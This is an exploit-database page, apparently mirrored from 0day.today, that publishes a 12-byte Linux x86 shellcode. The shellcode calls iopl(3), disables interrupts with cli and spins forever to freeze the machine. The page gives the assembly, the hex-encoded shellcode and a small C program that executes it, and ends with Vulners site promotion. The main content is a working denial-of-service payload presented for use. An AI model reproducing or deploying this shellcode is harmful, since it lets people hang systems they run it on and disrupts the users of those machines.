Lucene search
K

linux/x86 iopl(3); asm(cli); while(1){} 12 bytes

🗓️ 17 Sep 2008 00:00:00Reported by dunType 
zdt
 zdt
🔗 0day.today👁 57 Views

linux/x86 iopl(3) ASM cli freeze 12 byte

Code
================================================
linux/x86 iopl(3); asm(cli); while(1){} 12 bytes
================================================






/*
  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

 	[ dun[at]strcpy.pl ]
  
 [ linux/x86 iopl(3); asm("cli"); while(1){} 12 bytes ]
 
 ###############################################################
   iopl(3); asm("cli"); while(1){}
   // * this code cause freezeing system
 #################################################################
 
 __asm__(
	"xorl %eax, %eax\n"
	"pushl $0x3\n"
	"popl %ebx\n"
	"movb $0x6e,%al\n"
	"int $0x80\n"
	"cli\n"
	"x1:\n"
	"jmp x1\n"
 );

*/


char shellcode[]="\x31\xc0\x6a\x03\x5b\xb0\x6e\xcd\x80\xfa\xeb\xfe";

int main() {

	void (*sc)();
	sc = (void *)&shellcode;
	sc();
	
return 0;
}



#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2008 00:00Current
7High risk
Vulners AI Score7
57